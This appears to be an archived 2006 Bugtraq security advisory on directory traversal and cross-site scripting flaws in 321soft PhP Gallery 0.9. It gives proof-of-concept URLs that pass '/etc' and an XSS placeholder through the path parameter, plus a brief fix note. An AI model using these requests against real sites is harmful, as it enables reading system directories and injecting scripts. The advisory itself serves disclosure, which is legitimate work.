[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

321soft PhP Gallery 0.9 - directory travel & XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: 321soft PhP Gallery 0.9 - directory travel & XSS
From: d4igoro@xxxxxxxxx
Date: 2 May 2006 23:41:03 -0000

321soft PhP Gallery 0.9 - directory travel & XSS
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory travel & XSS
Date: Mai 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risc: Middle

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp

http://[target]/index.php?path=[XSS]

solution:
----------------------------
index.php
fix $path

notes:
----------------------------
The vendor has been informed.

http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html

Prev by Date: [USN-281-1] Linux kernel vulnerabilities
Next by Date: [USN-280-1] X.org server vulnerability
Previous by thread: [USN-281-1] Linux kernel vulnerabilities
Next by thread: [USN-280-1] X.org server vulnerability
Index(es):
- Date
- Thread